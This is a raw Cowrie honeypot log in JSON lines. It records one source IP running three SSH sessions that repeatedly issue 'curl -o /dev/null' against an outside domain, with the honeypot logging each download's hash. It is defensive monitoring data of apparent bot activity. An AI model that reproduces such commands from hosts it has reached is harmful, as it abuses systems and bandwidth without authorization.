{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.663261Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.663963Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.691919Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.693002Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.694179Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.698826Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.702271Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.704938Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.705556Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.709057Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.710165Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.739206Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.742332Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.744567Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.745377Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.753451Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.754159Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.757976Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.759528Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.760239Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.789432Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.792819Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.796696Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.797438Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.809520Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.810293Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.811987Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.812956Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.843316Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.845158Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.847532Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.849932Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.851441Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.852036Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.856099Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.857592Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.858201Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.860863Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.861326Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.867553Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.896533Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.897254Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.900741Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.903272Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.907219Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.908011Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.909712Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.910443Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.962201Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.963021Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.966498Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.970853Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.972052Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.975538Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.976209Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.003604Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.006421Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.007113Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.012341Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.015661Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.019469Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.020669Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.022927Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.024034Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.033205Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.056682Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.057597Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.062392Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.068725Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.069405Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.071089Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.072227Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.102252Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.105452Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.110137Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.111385Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.112670Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.118572Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.122560Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.123362Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.126717Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.127354Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
